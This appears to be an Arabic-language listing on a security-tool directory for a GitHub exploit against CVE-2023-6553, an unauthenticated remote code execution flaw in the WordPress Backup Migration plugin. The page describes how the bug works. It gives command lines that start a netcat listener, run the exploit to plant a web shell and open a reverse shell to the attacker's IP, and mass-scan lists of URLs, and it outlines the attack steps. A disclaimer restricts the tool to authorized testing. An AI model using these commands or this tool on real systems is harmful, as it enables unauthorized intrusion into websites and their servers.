Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WordPress_Backup_Migration-RCE_Unauthenticated — يعتمد هذا الاستغلال على CVE-2023-6553 وقد تم بناؤه بناءً على الاستغلال الأصلي لـ Chocapik، مع إضافة إمكانية الحصول على شل عكسي مباشر. | Kitploit
أدوات/GitHubGitHub/joaoaugustom/wordpress_backup_migration-rce_unauthenticated
أطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubjoaoaugustom/wordpress_backup_migration-rce_unauthenticated

WordPress_Backup_Migration-RCE_Unauthenticated

يعتمد هذا الاستغلال على CVE-2023-6553 وقد تم بناؤه بناءً على الاستغلال الأصلي لـ Chocapik، مع إضافة إمكانية الحصول على شل عكسي مباشر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 13 أياملم تتم المراجعة بعد

CVE-2023-6553 — مكوّن Backup Migration لووردبريس - شل عكسية

نسخة موسعة من استغلال Chocapikk لـ CVE-2023-6553 تضيف وضع شل عكسية بأمر واحد فوق الشل التفاعلية الأصلية.


الثغرة

CVE-2023-6553 — تنفيذ أكواد عن بُعد بدون مصادقة في مكوّن ووردبريس Backup Migration (الإصدارات ≤ 1.3.7).

يعرض المكوّن الملف backup-heart.php الذي يقرأ سلسلة فلترة PHP من رأس HTTP Content-Dir ويمررها إلى include() دون مصادقة أو تنقية. وهذا يسمح لمهاجم غير مصادق بتنفيذ كود PHP عشوائي عن طريق حقن سلسلة php://filter مبنية.

  • CVSS: 9.8 (خطير)
  • المكوّن: Backup Migration ≤ 1.3.7
  • المرجع: WPScan

الإسناد

الاستغلال الأصلي بواسطة Chocapikk — كل منطق الاستغلال الأساسي (توليد سلسلة الفلترة، كتابة الملف، الشل التفاعلية) هو من عمله. هذا المستودع فقط يوسعه بوضع تشغيل الشل العكسية.


الاختلافات عن الأصلي

الإضافات الوحيدة هي:

  1. طريقة trigger_reverse_shell() — بعد نشر الشل (نفس العملية الأصلية)، ترسل طلب GET واحد مع أمر الشل العكسية كمعامل 0، تمامًا كما تفعل الشل التفاعلية.
  2. 4 وسائط argparse جديدة — لتفعيل وتكوين وضع الشل العكسية.
  3. 5 أسطر في main() — استبدال interactive_shell() بـ trigger_reverse_shell() عند وجود -r.

كل شيء آخر — فحص الثغرة، حلقة كتابة الملف، النسخ/الحذف، الوضع التفاعلي، الفحص متعدد العناوين — لم يُمس من الأصل.


المتطلبات

root@kitploit:~
pip install requests rich alive-progress prompt-toolkit php-filter-chain

الاستخدام

وضع الشل العكسية (جديد)

root@kitploit:~
# Start your listener first
rlwrap nc -lvnp 4444

# Run the exploit
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444

إذا كان bash /dev/tcp غير متوفر على الهدف، استخدم mkfifo (يعتمد على nc بدلاً من ذلك):

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444 --shell mkfifo

وضع الشل التفاعلية (السلوك الأصلي)

root@kitploit:~
python3 exploit.py -u http://TARGET/blog

فحص الثغرة فقط

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -c

فحص قائمة من العناوين

root@kitploit:~
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt

جميع الوسائط

root@kitploit:~
-u / --url      عنوان الهدف الأساسي (مثل http://target/blog)
-r / --revshell تفعيل وضع الشل العكسية
-l / --lhost    عنوان IP الخاص بك لاستقبال الشل (مطلوب مع -r)
-p / --lport    منفذ المستمع الخاص بك (الافتراضي: 4444)
     --shell    نوع الشل: bash (الافتراضي) أو mkfifo
-c / --check    فحص الثغرة فقط، لا تنشر شل
-f / --file     ملف بقائمة العناوين للمسح
-t / --threads  عدد الخيوط لمسح متعدد العناوين (الافتراضي: 5)
-o / --output   ملف الإخراج لنتائج المسح

كيف يعمل

root@kitploit:~
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
   Content-Dir: php://filter/...<encoded PHP>
   → يكتب الشل حرفًا بحرف إلى ملف مؤقت
   → ينسخ الملف المؤقت إلى <random>.php

2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<cmd>
   → ينفذ الأمر عبر عامل backtick
   → الوضع التفاعلي: حلقة تقرأ الأوامر من stdin
   → وضع الشل العكسية: يرسل أمرًا واحدًا لـ bash/mkfifo، يتصل بالمستمع

3. التنظيف: حذف (<random>.php)

إخلاء المسؤولية

هذه الأداة مخصصة لاختبار الاختراق المصرح به والبحث الأمني فقط. لا تستخدمها ضد أنظمة ليس لديك إذن صريح لاختبارها.

تنزيل الأداة
الميزةالأصلي (Chocapikk)هذه النسخة
شل تفاعلية✅✅ (بدون تغيير)
شل عكسية❌✅ (-r)
فحص متعدد العناوين✅✅ (بدون تغيير)
وسائط جديدة—-r, -l, -p, --shell